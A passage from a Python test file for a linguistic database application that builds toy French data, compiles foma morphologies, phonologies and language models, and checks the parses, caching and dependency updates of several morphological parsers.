'V': model.SyntacticCategory(name=u'V'),\n 'AGR': model.SyntacticCategory(name=u'AGR'),\n 'Agr': model.SyntacticCategory(name=u'Agr'),\n 'PHI': model.SyntacticCategory(name=u'PHI'),\n 'S': model.SyntacticCategory(name=u'S'),\n 'D': model.SyntacticCategory(name=u'D')\n }\n Session.add_all(cats.values())\n Session.commit()\n cats = dict([(k, v.id) for k, v in cats.iteritems()])\n\n dataset = (\n ('chien', 'chien', 'dog', 'dog', cats['N']),\n ('chat', 'chat', 'cat', 'cat', cats['N']),\n ('oiseau', 'oiseau', 'bird', 'bird', cats['N']),\n ('cheval', 'cheval', 'horse', 'horse', cats['N']),\n ('vache', 'vache', 'cow', 'cow', cats['N']),\n ('grenouille', 'grenouille', 'frog', 'frog', cats['N']),\n ('tortue', 'tortue', 'turtle', 'turtle', cats['N']),\n ('fourmi', 'fourmi', 'ant', 'ant', cats['N']),\n ('poule!t', 'poule!t', 'chicken', 'chicken', cats['N']), # note the ! 
which is a foma reserved symbol\n (u'be\\u0301casse', u'be\\u0301casse', 'woodcock', 'woodcock', cats['N']),\n\n ('parle', 'parle', 'speak', 'speak', cats['V']),\n ('grimpe', 'grimpe', 'climb', 'climb', cats['V']),\n ('nage', 'nage', 'swim', 'swim', cats['V']),\n ('tombe', 'tombe', 'fall', 'fall', cats['V']),\n\n ('le', 'le', 'the', 'the', cats['D']),\n ('la', 'la', 'the', 'the', cats['D']),\n\n ('s', 's', 'PL', 'plural', cats['PHI']),\n\n ('ait', 'ait', '3SG.IMPV', 'third person singular imperfective', cats['AGR']),\n ('ait', 'ait', '3IMP', 'third person imparfait', cats['Agr']),\n ('aient', 'aient', '3PL.IMPV', 'third person plural imperfective', cats['AGR']),\n\n ('Les chats nageaient.', 'le-s chat-s nage-aient', 'the-PL cat-PL swim-3PL.IMPV',\n 'The cats were swimming.', cats['S']),\n ('La tortue parlait', 'la tortue parle-ait', 'the turtle speak-3SG.IMPV',\n 'The turtle was speaking.', cats['S']),\n ('La tortue tombait', 'la tortue tombe-ait', 'the turtle fall-3SG.IMPV',\n 'The turtle was falling.', cats['S']),\n ('Le chien parlait', 'le chien parle-ait', 'the dog speak-3IMP',\n 'The dog was speaking.', cats['S'])\n )\n\n for tuple_ in dataset:\n self.create_form(*map(unicode, tuple_))\n\n # Create a form search model that returns lexical items (will be used to create the lexicon corpus)\n query = {'filter': ['Form', 'syntactic_category', 'name', 'in', [u'N', u'V', u'AGR', u'PHI', u'D', u'Agr']]}\n params = self.form_search_create_params.copy()\n params.update({\n 'name': u'Find morphemes',\n 'search': query\n })\n params = json.dumps(params)\n response = self.app.post(url('formsearches'), params, self.json_headers, self.extra_environ_admin)\n lexicon_form_search_id = json.loads(response.body)['id']\n\n # Create the lexicon corpus\n params = self.corpus_create_params.copy()\n params.update({\n 'name': u'Corpus of lexical items',\n 'form_search': lexicon_form_search_id\n })\n params = json.dumps(params)\n response = self.app.post(url('corpora'), params, self.json_headers, self.extra_environ_admin)\n lexicon_corpus_id = json.loads(response.body)['id']\n\n # Create a form search model that returns sentences (will be used to create the rules corpus)\n query = {'filter': ['Form', 'syntactic_category', 'name', '=', u'S']}\n params = self.form_search_create_params.copy()\n params.update({\n 'name': u'Find sentences',\n 'description': u'Returns all sentential forms',\n 'search': query\n })\n params = json.dumps(params)\n response = self.app.post(url('formsearches'), params, self.json_headers, self.extra_environ_admin)\n rules_form_search_id = json.loads(response.body)['id']\n\n # Create the rules corpus\n params = self.corpus_create_params.copy()\n params.update({\n 'name': u'Corpus of sentences',\n 'form_search': rules_form_search_id\n })\n params = json.dumps(params)\n response = self.app.post(url('corpora'), params, self.json_headers, self.extra_environ_admin)\n rules_corpus_id = json.loads(response.body)['id']\n\n # Create a morphology using the lexicon and rules corpora\n name = u'Morphology of a very small subset of french'\n morphology_params = self.morphology_create_params.copy()\n morphology_params.update({\n 'name': name,\n 'lexicon_corpus': lexicon_corpus_id,\n 'rules_corpus': rules_corpus_id,\n 'script_type': 'regex'\n })\n morphology_params = json.dumps(morphology_params)\n response = self.app.post(url('morphologies'), morphology_params,\n self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n morphology_id = resp['id']\n assert resp['name'] == name\n 
assert resp['script_type'] == u'regex'\n\n # If foma is not installed, make sure the error message is being returned\n # and exit the test.\n if not h.foma_installed(force_check=True):\n response = self.app.put(url(controller='morphologies', action='generate_and_compile',\n id=morphology_id), headers=self.json_headers,\n extra_environ=self.extra_environ_contrib, status=400)\n resp = json.loads(response.body)\n assert resp['error'] == u'Foma and flookup are not installed.'\n return\n\n # Compile the morphology's script\n response = self.app.put(url(controller='morphologies', action='generate_and_compile',\n id=morphology_id), headers=self.json_headers,\n extra_environ=self.extra_environ_contrib)\n resp = json.loads(response.body)\n compile_attempt = resp['compile_attempt']\n\n # Poll ``GET /morphologies/morphology_id`` until ``compile_attempt`` has changed.\n requester = lambda: self.app.get(url('morphology', id=morphology_id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = self.poll(requester, 'generate_attempt', compile_attempt, log, wait=1,\n vocal=True, task_descr='compile morphology %s' % morphology_id)\n assert resp['compile_message'] == \\\n u'Compilation process terminated successfully and new binary file was written.'\n\n response = self.app.get(url('morphology', id=morphology_id), params={'script': u'1', 'lexicon': u'1'},\n headers=self.json_headers, extra_environ=self.extra_environ_contrib)\n resp = json.loads(response.body)\n morphology_dir = os.path.join(self.morphologies_path, 'morphology_%d' % morphology_id)\n morphology_binary_filename = 'morphology.foma'\n morphology_dir_contents = os.listdir(morphology_dir)\n morphology_script_path = os.path.join(morphology_dir, 'morphology.script')\n morphology_script = codecs.open(morphology_script_path, mode='r', encoding='utf8').read()\n assert u'define morphology' in morphology_script\n assert u'(NCat)' in morphology_script # cf. tortue\n assert u'(DCat)' in morphology_script # cf. la\n assert u'(NCat \"-\" PHICat)' in morphology_script # cf. chien-s\n assert u'(DCat \"-\" PHICat)' in morphology_script # cf. le-s\n assert u'(VCat \"-\" AGRCat)' in morphology_script # cf. nage-aient, parle-ait\n assert u'c h a t \"%scat%sN\":0' % (h.rare_delimiter, h.rare_delimiter) in morphology_script # cf. extract_morphemes_from_rules_corpus = False and chat's exclusion from the lexicon corpus\n assert u'c h i e n \"%sdog%sN\":0' % (h.rare_delimiter, h.rare_delimiter) in morphology_script\n assert u'b e \\u0301 c a s s e \"%swoodcock%sN\":0' % (h.rare_delimiter, h.rare_delimiter) in morphology_script\n assert resp['compile_succeeded'] == True\n assert resp['compile_message'] == u'Compilation process terminated successfully and new binary file was written.'\n assert morphology_binary_filename in morphology_dir_contents\n assert resp['modifier']['role'] == u'contributor'\n rules = resp['rules_generated']\n assert u'D' in rules # cf. le\n assert u'N' in rules # cf. tortue\n assert u'D-PHI' in rules # cf. le-s\n assert u'N-PHI' in rules # cf. chien-s\n assert u'V-AGR' in rules # cf. 
nage-aient, parle-ait\n assert 'lexicon' in resp\n assert 'script' in resp\n assert resp['script'] == morphology_script\n assert [u'chat', u'cat'] in resp['lexicon']['N']\n assert [u'chien', u'dog'] in resp['lexicon']['N']\n\n # Test GET /morphologies/1?script=1&lexicon=1 and make sure the script and lexicon are returned\n response = self.app.get(url('morphology', id=morphology_id), params={'script': u'1', 'lexicon': u'1'},\n headers=self.json_headers, extra_environ=self.extra_environ_contrib)\n resp = json.loads(response.body)\n assert resp['script'] == morphology_script\n lexicon = resp['lexicon']\n assert ['s', 'PL'] in lexicon['PHI']\n assert ['oiseau', 'bird'] in lexicon['N']\n assert ['aient', '3PL.IMPV'] in lexicon['AGR']\n assert ['la', 'the'] in lexicon['D']\n assert ['nage', 'swim'] in lexicon['V']\n\n ################################################################################\n # BEGIN IMPOVERISHED REPRESENTATION MORPHOLOGY\n ################################################################################\n\n # Create a new morphology, this time one that parses to impoverished representations.\n impoverished_name = u'Morphology of a very small subset of french, impoverished morphemes'\n morphology_params = self.morphology_create_params.copy()\n morphology_params.update({\n 'name': impoverished_name,\n 'lexicon_corpus': lexicon_corpus_id,\n 'rules_corpus': rules_corpus_id,\n 'script_type': 'regex',\n 'rich_upper': False\n })\n morphology_params = json.dumps(morphology_params)\n response = self.app.post(url('morphologies'), morphology_params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n impoverished_morphology_id = resp['id']\n assert resp['name'] == impoverished_name\n assert resp['script_type'] == u'regex'\n\n # Compile the morphology's script\n response = self.app.put(url(controller='morphologies', action='generate_and_compile',\n id=impoverished_morphology_id), headers=self.json_headers,\n extra_environ=self.extra_environ_contrib)\n resp = json.loads(response.body)\n compile_attempt = resp['compile_attempt']\n\n # Poll ``GET /morphologies/morphology_id`` until ``compile_attempt`` has changed.\n requester = lambda: self.app.get(url('morphology', id=impoverished_morphology_id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = self.poll(requester, 'generate_attempt', compile_attempt, log, wait=1,\n vocal=True, task_descr='compile morphology %s' % impoverished_morphology_id)\n assert resp['compile_message'] == \\\n u'Compilation process terminated successfully and new binary file was written.'\n\n response = self.app.get(url('morphology', id=impoverished_morphology_id), params={'script': u'1', 'lexicon': u'1'},\n headers=self.json_headers, extra_environ=self.extra_environ_contrib)\n resp = json.loads(response.body)\n morphology_dir = os.path.join(self.morphologies_path, 'morphology_%d' % impoverished_morphology_id)\n morphology_binary_filename = 'morphology.foma'\n morphology_dir_contents = os.listdir(morphology_dir)\n morphology_script_path = os.path.join(morphology_dir, 'morphology.script')\n morphology_script = codecs.open(morphology_script_path, mode='r', encoding='utf8').read()\n assert u'define morphology' in morphology_script\n assert u'(NCat)' in morphology_script # cf. tortue\n assert u'(DCat)' in morphology_script # cf. la\n assert u'(NCat \"-\" PHICat)' in morphology_script # cf. chien-s\n assert u'(DCat \"-\" PHICat)' in morphology_script # cf. 
le-s\n assert u'(VCat \"-\" AGRCat)' in morphology_script # cf. nage-aient, parle-ait\n assert u'c h a t' in morphology_script # cf. extract_morphemes_from_rules_corpus = False and chat's exclusion from the lexicon corpus\n assert u'c h i e n' in morphology_script\n assert u'b e \\u0301 c a s s e' in morphology_script\n assert resp['compile_succeeded'] == True\n assert resp['compile_message'] == u'Compilation process terminated successfully and new binary file was written.'\n assert morphology_binary_filename in morphology_dir_contents\n assert resp['modifier']['role'] == u'contributor'\n rules = resp['rules_generated']\n assert u'D' in rules # cf. le\n assert u'N' in rules # cf. tortue\n assert u'D-PHI' in rules # cf. le-s\n assert u'N-PHI' in rules # cf. chien-s\n assert u'V-AGR' in rules # cf. nage-aient, parle-ait\n assert 'lexicon' in resp\n assert 'script' in resp\n assert resp['script'] == morphology_script\n assert [u'chat', u'cat'] in resp['lexicon']['N']\n assert [u'chien', u'dog'] in resp['lexicon']['N']\n\n # Test GET /morphologies/1?script=1&lexicon=1 and make sure the script and lexicon are returned\n response = self.app.get(url('morphology', id=impoverished_morphology_id), params={'script': u'1', 'lexicon': u'1'},\n headers=self.json_headers, extra_environ=self.extra_environ_contrib)\n resp = json.loads(response.body)\n assert resp['script'] == morphology_script\n lexicon = resp['lexicon']\n assert ['s', 'PL'] in lexicon['PHI']\n assert ['oiseau', 'bird'] in lexicon['N']\n assert ['aient', '3PL.IMPV'] in lexicon['AGR']\n assert ['la', 'the'] in lexicon['D']\n assert ['nage', 'swim'] in lexicon['V']\n\n ################################################################################\n # END IMPOVERISHED REPRESENTATION MORPHOLOGY\n ################################################################################\n\n # Create a very simple French phonology\n script = u'''\ndefine eDrop e -> 0 || _ \"-\" a;\ndefine breakDrop \"-\" -> 0;\ndefine phonology eDrop .o. 
breakDrop;\n '''\n params = self.phonology_create_params.copy()\n params.update({\n 'name': u'Phonology',\n 'description': u'Covers a lot of the data.',\n 'script': script\n })\n params = json.dumps(params)\n response = self.app.post(url('phonologies'), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n phonology_id = resp['id']\n\n ################################################################################\n # LANGUAGE MODEL 1 \n ################################################################################\n\n # Create a corpus heavily stacked towards tombe|fall-ait|3SG.IMPV and V-AGR\n # as opposed to tombe|fall-ait|3IMP and V-Agr.\n sentences = Session.query(model.Form).filter(model.Form.syntactic_category.has(\n model.SyntacticCategory.name==u'S')).all()\n target_id = [s for s in sentences if s.transcription == u'La tortue tombait'][0].id\n sentence_ids = [s.id for s in sentences] + [target_id] * 100\n params = self.corpus_create_params.copy()\n params.update({\n 'name': u'Corpus of sentences with lots of form %s' % target_id,\n 'content': u','.join(map(unicode, sentence_ids))\n })\n params = json.dumps(params)\n response = self.app.post(url('corpora'), params, self.json_headers, self.extra_environ_admin)\n lm_corpus_id = json.loads(response.body)['id']\n\n # Create the LM using lm_corpus\n name = u'Morpheme language model'\n params = self.morpheme_language_model_create_params.copy()\n params.update({\n 'name': name,\n 'corpus': lm_corpus_id,\n 'toolkit': 'mitlm'\n })\n params = json.dumps(params)\n response = self.app.post(url('morphemelanguagemodels'), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n morpheme_language_model_id = resp['id']\n assert resp['name'] == name\n assert resp['toolkit'] == u'mitlm'\n assert resp['order'] == 3\n assert resp['smoothing'] == u'' # The ModKN smoothing algorithm is the implicit default with MITLM\n\n # Generate the files of the language model\n response = self.app.put(url(controller='morphemelanguagemodels', action='generate', id=morpheme_language_model_id),\n {}, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n lm_generate_attempt = resp['generate_attempt']\n\n # Poll GET /morphemelanguagemodels/id until generate_attempt changes.\n requester = lambda: self.app.get(url('morphemelanguagemodel', id=morpheme_language_model_id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = self.poll(requester, 'generate_attempt', lm_generate_attempt, log, wait=1, vocal=False)\n assert resp['generate_message'] == u'Language model successfully generated.'\n\n ################################################################################\n # LANGUAGE MODEL 2 -- CATEGORIAL\n ################################################################################\n\n categorial_lm_name = u'Morpheme language model -- categorial'\n params = self.morpheme_language_model_create_params.copy()\n params.update({\n 'name': categorial_lm_name,\n 'corpus': lm_corpus_id,\n 'toolkit': 'mitlm',\n 'categorial': True\n })\n params = json.dumps(params)\n response = self.app.post(url('morphemelanguagemodels'), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n categorial_language_model_id = resp['id']\n assert resp['name'] == categorial_lm_name\n assert resp['toolkit'] == u'mitlm'\n assert resp['order'] == 3\n assert resp['smoothing'] == u'' # The ModKN smoothing algorithm is the implicit default with 
MITLM\n assert resp['categorial'] == True\n\n # Generate the files of the language model\n response = self.app.put(url(controller='morphemelanguagemodels', action='generate',\n id=categorial_language_model_id),\n {}, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n lm_generate_attempt = resp['generate_attempt']\n\n # Poll GET /morphemelanguagemodels/id until generate_attempt changes.\n requester = lambda: self.app.get(url('morphemelanguagemodel', id=categorial_language_model_id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = self.poll(requester, 'generate_attempt', lm_generate_attempt, log, wait=1, vocal=False)\n assert resp['generate_message'] == u'Language model successfully generated.'\n\n ################################################################################\n # TRANSCRIPTIONS & PARSES\n ################################################################################\n\n transcription1 = u'tombait'\n transcription1_correct_parse = u'%s-%s' % (\n h.rare_delimiter.join([u'tombe', u'fall', u'V']),\n h.rare_delimiter.join([u'ait', u'3SG.IMPV', u'AGR']))\n transcription1_alt_parse = u'%s-%s' % (\n h.rare_delimiter.join([u'tombe', u'fall', u'V']),\n h.rare_delimiter.join([u'ait', u'3IMP', u'Agr']))\n transcription1_impoverished_parse = u'tombe-ait'\n transcription2 = u'tombeait'\n transcription3 = u'chiens'\n transcription3_correct_parse = u'%s-%s' % (\n h.rare_delimiter.join([u'chien', u'dog', u'N']),\n h.rare_delimiter.join([u's', u'PL', u'PHI']))\n transcription3_impoverished_parse = u'chiens-s'\n\n\n ################################################################################\n # MORPHOLOGICAL PARSER 1\n ################################################################################\n\n # Create a morphological parser for toy french\n params = self.morphological_parser_create_params.copy()\n params.update({\n 'name': u'Morphological parser for toy French',\n 'phonology': phonology_id,\n 'morphology': morphology_id,\n 'language_model': morpheme_language_model_id\n })\n params = json.dumps(params)\n response = self.app.post(url('morphologicalparsers'), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_id = resp['id']\n\n # Generate the parser's morphophonology FST and compile it.\n response = self.app.put(url(controller='morphologicalparsers', action='generate_and_compile',\n id=morphological_parser_id), headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_compile_attempt = resp['compile_attempt']\n\n # Poll ``GET /morphologicalparsers/morphological_parser_id`` until ``compile_attempt`` has changed.\n while True:\n response = self.app.get(url('morphologicalparser', id=morphological_parser_id),\n headers=self.json_headers, extra_environ=self.extra_environ_contrib)\n resp = json.loads(response.body)\n if morphological_parser_compile_attempt != resp['compile_attempt']:\n log.debug('Compile attempt for morphological parser %d has terminated.' % morphological_parser_id)\n break\n else:\n log.debug('Waiting for morphological parser %d to compile ...' 
% morphological_parser_id)\n sleep(1)\n\n # Test applyup on the mophological parser's morphophonology FST\n params = json.dumps({'transcriptions': [transcription1, transcription2]})\n response = self.app.put(url(controller='morphologicalparsers', action='applyup',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert transcription1_correct_parse in resp[transcription1]\n assert len(resp[transcription1]) == 2\n assert resp[transcription2] == []\n\n # Test how well the morphological parser parses some test words.\n # In-memory cache will result in the second request to parse transcription 1\n # being accomplished via dict lookup. Parses for both transcriptions 1 and 2\n # will be persisted across requests in the ``parse`` table.\n params = json.dumps({'transcriptions': [transcription1, transcription1, transcription3]})\n response = self.app.put(url(controller='morphologicalparsers', action='parse',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert resp[transcription1] == transcription1_correct_parse\n assert resp[transcription3] == transcription3_correct_parse\n\n # Make the same parse request again. This time the persistent cache will be used\n # and all of the parses returned will be from the cache, i.e., no subprocesses to \n # flookup will be initiated.\n params = json.dumps({'transcriptions': [transcription1, transcription1, transcription3, 'abc']})\n response = self.app.put(url(controller='morphologicalparsers', action='parse',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert resp[transcription1] == transcription1_correct_parse\n assert resp[transcription3] == transcription3_correct_parse\n assert resp['abc'] == None\n\n ################################################################################\n # END MORPHOLOGICAL PARSER 1\n ################################################################################\n\n ################################################################################\n # MORPHOLOGICAL PARSER 2\n ################################################################################\n\n # Create an impoverished morphemes morphological parser for toy french\n params = self.morphological_parser_create_params.copy()\n params.update({\n 'name': u'Morphological parser for toy French, impoverished morphemes',\n 'phonology': phonology_id,\n 'morphology': impoverished_morphology_id,\n 'language_model': morpheme_language_model_id\n })\n params = json.dumps(params)\n response = self.app.post(url('morphologicalparsers'), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_id = resp['id']\n\n # Generate the parser's morphophonology FST and compile it.\n response = self.app.put(url(controller='morphologicalparsers', action='generate_and_compile',\n id=morphological_parser_id), headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_compile_attempt = resp['compile_attempt']\n\n # Poll ``GET /morphologicalparsers/morphological_parser_id`` until ``compile_attempt`` has changed.\n while True:\n response = self.app.get(url('morphologicalparser', id=morphological_parser_id),\n headers=self.json_headers, extra_environ=self.extra_environ_contrib)\n resp = json.loads(response.body)\n if morphological_parser_compile_attempt != 
resp['compile_attempt']:\n log.debug('Compile attempt for morphological parser %d has terminated.' % morphological_parser_id)\n break\n else:\n log.debug('Waiting for morphological parser %d to compile ...' % morphological_parser_id)\n sleep(1)\n\n # Test applyup on the mophological parser's morphophonology FST\n # Because the morphology returns impoverished representations, the morphophonology_\n # will too.\n params = json.dumps({'transcriptions': [transcription1, transcription2]})\n response = self.app.put(url(controller='morphologicalparsers', action='applyup',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert transcription1_impoverished_parse in resp[transcription1]\n assert len(resp[transcription1]) == 1\n assert resp[transcription2] == []\n\n # Test applydown on the mophological parser's morphophonology FST\n params = json.dumps({'morpheme_sequences': [transcription1_impoverished_parse]})\n response = self.app.put(url(controller='morphologicalparsers', action='applydown',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert transcription1 in resp[transcription1_impoverished_parse]\n\n # Test how well the morphological parser parses some test words.\n params = json.dumps({'transcriptions': [transcription1]})\n response = self.app.put(url(controller='morphologicalparsers', action='parse',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n\n # Note how the rich representation is always returned by a parser even if its morphophonology\n # returns impoverished ones. The ``parse`` action disambiguates the morphemic analysis received\n # from the morphophonology before selecting the most probable candidate.\n assert resp[transcription1] == transcription1_correct_parse\n\n ################################################################################\n # END MORPHOLOGICAL PARSER 2\n ################################################################################\n\n ################################################################################\n # MORPHOLOGICAL PARSER 3 -- categorial LM\n ################################################################################\n\n # Create categorial LM morphological parser for toy french\n params = self.morphological_parser_create_params.copy()\n params.update({\n 'name': u'Morphological parser for toy French, categorial LM',\n 'phonology': phonology_id,\n 'morphology': morphology_id,\n 'language_model': categorial_language_model_id\n })\n params = json.dumps(params)\n response = self.app.post(url('morphologicalparsers'), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_id = resp['id']\n\n # Generate the parser's morphophonology FST and compile it.\n response = self.app.put(url(controller='morphologicalparsers', action='generate_and_compile',\n id=morphological_parser_id), headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_compile_attempt = resp['compile_attempt']\n\n # Poll ``GET /morphologicalparsers/morphological_parser_id`` until ``compile_attempt`` has changed.\n while True:\n response = self.app.get(url('morphologicalparser', id=morphological_parser_id),\n headers=self.json_headers, extra_environ=self.extra_environ_contrib)\n resp = json.loads(response.body)\n if 
morphological_parser_compile_attempt != resp['compile_attempt']:\n log.debug('Compile attempt for morphological parser %d has terminated.' % morphological_parser_id)\n break\n else:\n log.debug('Waiting for morphological parser %d to compile ...' % morphological_parser_id)\n sleep(1)\n\n # Test applyup on the mophological parser's morphophonology FST. Everything should\n # work just like parser #1.\n params = json.dumps({'transcriptions': [transcription1, transcription2]})\n response = self.app.put(url(controller='morphologicalparsers', action='applyup',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert transcription1_correct_parse in resp[transcription1]\n assert len(resp[transcription1]) == 2\n assert resp[transcription2] == []\n\n # Test applydown on the mophological parser's morphophonology FST\n params = json.dumps({'morpheme_sequences': [transcription1_correct_parse]})\n response = self.app.put(url(controller='morphologicalparsers', action='applydown',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert transcription1 in resp[transcription1_correct_parse]\n\n # Test how well the morphological parser parses some test words.\n params = json.dumps({'transcriptions': [transcription1]})\n response = self.app.put(url(controller='morphologicalparsers', action='parse',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n # There is only one possible parse for transcription 1 -- it is de facto the most probable\n assert resp[transcription1] == transcription1_correct_parse\n\n ################################################################################\n # END MORPHOLOGICAL PARSER 3\n ################################################################################\n\n ################################################################################\n # MORPHOLOGICAL PARSER 4 -- categorial LM & impoverished morphology\n ################################################################################\n\n # Create categorial LM, impoverished morphology morphological parser for toy french\n params = self.morphological_parser_create_params.copy()\n params.update({\n 'name': u'Morphological parser for toy French, categorial LM, impoverished morphology',\n 'phonology': phonology_id,\n 'morphology': impoverished_morphology_id,\n 'language_model': categorial_language_model_id\n })\n params = json.dumps(params)\n response = self.app.post(url('morphologicalparsers'), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_id = parser_4_id = resp['id']\n\n # Generate the parser's morphophonology FST and compile it.\n response = self.app.put(url(controller='morphologicalparsers', action='generate_and_compile',\n id=morphological_parser_id), headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_compile_attempt = resp['compile_attempt']\n\n # Poll ``GET /morphologicalparsers/morphological_parser_id`` until ``compile_attempt`` has changed.\n while True:\n response = self.app.get(url('morphologicalparser', id=morphological_parser_id),\n headers=self.json_headers, extra_environ=self.extra_environ_contrib)\n resp = json.loads(response.body)\n if morphological_parser_compile_attempt != resp['compile_attempt']:\n log.debug('Compile attempt for morphological parser %d 
has terminated.' % morphological_parser_id)\n break\n else:\n log.debug('Waiting for morphological parser %d to compile ...' % morphological_parser_id)\n sleep(1)\n\n # Test applyup on the mophological parser's morphophonology FST. Expect to get morpheme \n # form sequences. \n params = json.dumps({'transcriptions': [transcription1, transcription2]})\n response = self.app.put(url(controller='morphologicalparsers', action='applyup',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert transcription1_impoverished_parse in resp[transcription1]\n assert len(resp[transcription1]) == 1\n assert resp[transcription2] == []\n\n # Test applydown on the mophological parser's morphophonology FST\n params = json.dumps({'morpheme_sequences': [transcription1_impoverished_parse]})\n response = self.app.put(url(controller='morphologicalparsers', action='applydown',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert transcription1 in resp[transcription1_impoverished_parse]\n\n # Test how well the morphological parser parses some test words.\n params = json.dumps({'transcriptions': [transcription1]})\n response = self.app.put(url(controller='morphologicalparsers', action='parse',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n # parse time disambiguation and categorial LM application should all conspire to return the correct parse...\n assert resp[transcription1] == transcription1_correct_parse\n\n ################################################################################\n # END MORPHOLOGICAL PARSER 4\n ################################################################################\n\n ################################################################################\n # TEST PARSER DEPENDENCY REPLICATION\n ################################################################################\n\n # Vacuously re-generate and re-compile the parser\n ################################################################################\n\n # Show that the cache will not be cleared.\n\n parser_4_parses = sorted([parse.transcription for parse in Session.query(model.Parse).\\\n filter(model.Parse.parser_id==parser_4_id).all()])\n\n response = self.app.put(url(controller='morphologicalparsers', action='generate_and_compile',\n id=parser_4_id), headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_compile_attempt = resp['compile_attempt']\n\n # Poll GET /morphologicalparsers/id until compile_attempt changes.\n requester = lambda: self.app.get(url('morphologicalparser', id=parser_4_id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = self.poll(requester, 'compile_attempt', morphological_parser_compile_attempt,\n log, wait=1, vocal=True, task_descr='compile parser %s' % parser_4_id)\n\n # Perform the same parse request as previously and expect the same results.\n params = json.dumps({'transcriptions': [transcription1]})\n response = self.app.put(url(controller='morphologicalparsers', action='parse',\n id=parser_4_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert resp[transcription1] == transcription1_correct_parse\n\n parser_4_parses_now = sorted([parse.transcription for parse in Session.query(model.Parse).\\\n 
filter(model.Parse.parser_id==parser_4_id).all()])\n assert parser_4_parses == parser_4_parses_now\n\n # Update the parser's LM\n ################################################################################\n\n # The parsing behaviour of the parser will not change because it has not been\n # re-generated or re-compiled.\n\n # For the updated LM, create a new corpus heavily stacked towards V-Agr.\n sentences = Session.query(model.Form).filter(model.Form.syntactic_category.has(\n model.SyntacticCategory.name==u'S')).all()\n # The sentence below is analyzed using an Agr-categorized suffix\n target_id = [s for s in sentences if s.transcription == u'Le chien parlait'][0].id\n sentence_ids = [s.id for s in sentences] + [target_id] * 100\n params = self.corpus_create_params.copy()\n params.update({\n 'name': u'Corpus of sentences with lots of form %s' % target_id,\n 'content': u','.join(map(unicode, sentence_ids))\n })\n params = json.dumps(params)\n response = self.app.post(url('corpora'), params, self.json_headers, self.extra_environ_admin)\n lm_corpus_2_id = json.loads(response.body)['id']\n\n # update the categorial LM so that its corpus is the newly created one.\n params = self.morpheme_language_model_create_params.copy()\n params.update({\n 'name': categorial_lm_name,\n 'corpus': lm_corpus_2_id, # HERE IS THE CHANGE\n 'toolkit': 'mitlm',\n 'categorial': True\n })\n params = json.dumps(params)\n response = self.app.put(url('morphemelanguagemodel', id=categorial_language_model_id),\n params, self.json_headers, self.extra_environ_admin)\n\n # Request that the files of the language model be generated anew; this will create a new\n # LMTree pickle file.\n response = self.app.put(url(controller='morphemelanguagemodels', action='generate',\n id=categorial_language_model_id),\n {}, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n lm_generate_attempt = resp['generate_attempt']\n\n # Poll GET /morphemelanguagemodels/id until generate_attempt changes.\n requester = lambda: self.app.get(url('morphemelanguagemodel', id=categorial_language_model_id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = self.poll(requester, 'generate_attempt', lm_generate_attempt, log, wait=1, vocal=False)\n assert resp['generate_message'] == u'Language model successfully generated.'\n\n # Now if we try to parse \"tombait\" using parser #4 we will still get the V-AGR parse\n # even though the LM associated to that parser (the categorial one) has been changed to be\n # weighted heavily towards the V-Agr parse.\n params = json.dumps({'transcriptions': [transcription1]})\n response = self.app.put(url(controller='morphologicalparsers', action='parse',\n id=parser_4_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert resp[transcription1] == transcription1_correct_parse\n\n # Request probabilities form the just re-generated LM and expect V-Agr to be higher.\n likely_word = u'V Agr'\n unlikely_word = u'V AGR'\n ms_params = json.dumps({'morpheme_sequences': [likely_word, unlikely_word]})\n response = self.app.put(url(controller='morphemelanguagemodels', action='get_probabilities',\n id=categorial_language_model_id), ms_params, self.json_headers, self.extra_environ_admin)\n resp = 